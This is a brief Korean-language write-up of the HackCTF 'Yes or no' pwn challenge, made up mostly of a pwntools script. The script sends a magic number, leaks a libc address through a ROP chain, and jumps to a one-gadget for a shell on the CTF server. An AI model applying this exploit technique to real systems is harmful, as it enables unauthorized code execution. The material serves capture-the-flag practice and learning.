HackCTF - Yes or no

 

 

v10 을 찾아야한다

 

gdb로 확인해보면

10진수로 9830400

값을 넣고 gets 를 이용해 rop 를 진행하면 된다

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3009)
e = ELF('./yes_or_no', checksec=False)
libc = ELF('./libc-2.27.so', checksec=False)

r.sendline('9830400')
r.recvuntil('me\n')

payload = 'A'*26
payload += p64(0x0400883)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['main'])

r.sendline(payload)
leak = u64(r.recv(6)+ '\x00\x00')

libc_base = leak - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()
oneshot = libc_base + 0x10a38c

r.sendlineafter('~!\n', '9830400')

payload = 'A'*26
payload += p64(oneshot)

r.sendline(payload)

r.interactive()